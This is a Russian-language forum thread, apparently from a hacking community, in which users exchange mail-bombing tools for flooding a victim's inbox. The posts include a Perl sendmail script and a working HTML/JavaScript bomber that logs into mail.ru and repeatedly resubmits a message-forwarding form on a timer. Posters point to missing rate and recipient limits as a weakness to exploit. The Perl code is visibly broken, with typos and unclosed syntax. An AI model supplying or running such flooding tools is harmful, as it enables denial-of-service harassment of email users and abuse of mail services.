Народ ..приветы всем..я понимаю ..что мыл бомбинг и мыл бомберы уже старо как мир..но все же..посоветуйте хороший мыл бомбер..а то чет ни одного толкового нет...не получается бомбить (испытывал на своем ящике)...всетаки ..пусть будет такая штука на всякий случай.
Советую использовать в качве шаблона html-флудер для чата, а в action указать запрос на переадресовку сообщения со своего ящика на неприятельский. 3-5 писем в секунду обеспечено, причем трафик практически не нагружается, и не зависит от размера файла, так что файлом в 200кб можно под завязку забить ящик где-то за минуту
Вот в чем дело: html-овский флудер для чата тут не подойдет, т.к. на многих бесплатных хостингах стоит таймаут. Там надо отсылать n-ное кол-во сообщений и заново перезагружать программу (это самый простой вариант - я уже не говорю о создании нескольких потоков с использованием прокси-сервера). Почту можно отправлять и с помощью PHP3? ASP (Active Server Pages) ... Можно написать прогу, которая сама соединится с Smtp серваком и сделает запрос на отправку письма ... Лучше всего эту программу написать на перле, которая будет работать не с твоего компа, а с сервака. Тогда и скорость будет приличная и траффик не жрет. Я не очень силен в перле, но код должен быть такой примерно: #!/usr/local/bin/perl $mailprog= '/usr/sbin/sendmail'; $mail = 'proba@mail.ru'; $from = 'antichat@mail.ru'; open (mail, "|$mailprog -t" print Mail "Countet-Type: text/plain; charset=windows-1251\n; print Mail "Subjest: 'Привет Дарку '\n"; <span style='color:red'>#Вот не помню как тема пишется - в апострофах или нет...</span> print mail "to: $mail/n"; print Mail "from: $form\n\n"; print mail "Текст письма\n"; print mail "\n\n"; close (mail); print "content-type: text/html\n\n"; print "Письмо для дарка отправлено!"; И когда ты запустишь прогу из своей бродилки, то появится сообщение, что письмо дарку отправлено, оно будет лежать в твоем ящике. Я это не компилировал, так что за работу не ручаюсь ... С уважением, Че Гевара
Осталось только найти бесплатный хостинг с поддержкой cgi и исходящим коннектом) Так что думаю html-флудер использовать проще, тем более на mail.ru например в скрипте http://win.mail.ru/cgi-bin/bouncemsg не стоит ограничения по времени, более того, в поле "To", то есть кому, нет ограничений по кол-ву адресатов, по крайней мере я при тестировании бомбил сразу 6 ящиков
идея за хтмл флудер реальна и проста. подойдет, если по приколу самому забацать за 0.1 сек А Че Гевара тут скрипты рисует какие то мутные: уже начал писать, так забацал бы весь скрипт уже (и цыкл, с бесконечной отправкой...) а то, не а, не то ... кому оно нада, в таком вот виде? над бы хтмл форму намалевать, саму работу в 2х словах описать, что вообще реально, как запустить из формы(с какими параметрами), как будет сформировано обращение к скрипту? (хз, можт ты собрался с помощью джавы делать флудинг из формы...) а сырец реально до жопы, если чел не вьедет в работу цги, а сэндмыло все порубит и так: на хостингах все будет происходить оч долго, и юзвер добавит тебя в игнор. (гы, привет дафи дарк! ) мне кажется, что все можно сделать проще, с помощью скрипта cgi-mail: я заглянул только что в код, и выкупил, что он реально дыже сындмыло не юзает, вау! вот и находка, епть. еще позволяет цеплять нехилые аттачи, внушительных размеров. это то, что нада: валишь как хошь: числом и размером, и таймауты пофигу. вот он - рулеззз.
< script> function bombing(){ document.forms[1].submit(); time1=setTimeout('bombing()',document.forms[2].interval.value); } </script> <form name="Auth" method=post action=http://win.mail.ru/cgi-bin/auth target="right"> <input type=hidden name=SessionID value=ID_СЕССИИ_МОЖНО_НЕ_МЕНЯТЬ> <input type=hidden name=Mpopl value=217715896> <input type=hidden name=login_from value=titul> <input type=hidden name="Login" value="ЛОГИН_НА_МЭЙЛ_РУ"> <input type=hidden name="Domain" value="ДОМЕН"> <input type="hidden" name="Password" value="ПАРОЛЬ"></td> <input TYPE=submit name="" value=" Войти "> </form> <form method="post" target="right" action="http://win.mail.ru/cgi-bin/bouncemsg"> <input type="hidden" name="id" value="ID_ПИСЬМА_КОТОРЫМ_БОМБИТЬ"> <input name="To"> <input type="button" name="Submit" value="ХУЙЯРИТЬ!" onClick="bombing()"> <input type="button" value="АЦТАВИТЬ!" onClick="clearTimeout(time1)"> </form> <form> <input name=interval value=500 size=4> </form> Вот html-код главного фрейма моего бомбера. Регистрируешь мыло на мэйле, отсылаешь туда файл требуемой длины, прописываешь в бомбере ID письма, логин, пароль, и весь процесс автоматизируется: нажимаешь "войти", вводишь адрес мыла которое надо бомбить, и бомбишь) Порадовало, повторяюсь, то, что трафик не жрет